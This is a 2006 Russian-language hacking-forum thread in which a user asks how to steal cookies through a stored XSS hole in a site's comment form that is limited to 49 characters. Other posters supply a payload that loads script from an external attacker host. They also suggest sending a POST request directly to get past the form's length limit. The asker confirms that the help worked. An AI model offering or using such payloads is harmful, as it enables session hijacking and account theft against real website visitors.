PDA

Просмотр полной версии : 49 символов для Xss атаки


cop
19.11.2006, 23:00
Есть уязвимость на сайте: в форме комментариев можно вписать html теги. Как можно сформировать такой JavaScript, шоб своровать куки для формы в 49 символов (обрезаеться базой)?

GreenBear
19.11.2006, 23:06
http://forum.antichat.ru/thread25933.html

cop
19.11.2006, 23:11
Green_Bear, да, это все понятно. У меня для формы доступно только 49 символов, я не могу ничего придумать, шоб как-нить сформировать рабочий код. (я в первом сообщении исправил про 49 символов)

_Great_
19.11.2006, 23:13
<script src='http://site.ru/a.js'></script>

А в site.ru/a.js написать остальной код

nc.STRIEM
19.11.2006, 23:55
А чем эти 49 символов обрезаються???? Есле это ограничение в форме, то прост пошли POST запрос, в самао скрипте редко длинна проверяеться!
а ваше смотри что те _Great_ написал! ;)

_Great_
20.11.2006, 00:04
А чем эти 49 символов обрезаються???? Есле это ограничение в форме, то прост пошли Post запрос, в самао скрипте редко длинна проверяеться!
он же написал - базой.. а это хреново. Но моим способом уложиться можно

cop
20.11.2006, 00:19
супер, ребята спасибо!!!!

cop
20.11.2006, 00:20
не допер шото сам :(

jonart
20.11.2006, 17:17
_Great_
а у мня вопрос а если перед вставкой в бд например он проверяет кол-во символов поступающих получиться что он еще и посчитает все символы и с файла который вставляем ведь!Верно?

GreenBear
20.11.2006, 17:20
ну ты гонишь. ничего там не будет считать с файла.

_Great_
20.11.2006, 18:48
JS выполняется на СТОРОНЕ КЛИЕНТА. Серверу посрать какие файлы куда включены в коде. он тупо включает эти символы (js-код) в базу и ничего больше.
Включение файла делает браузер у клиента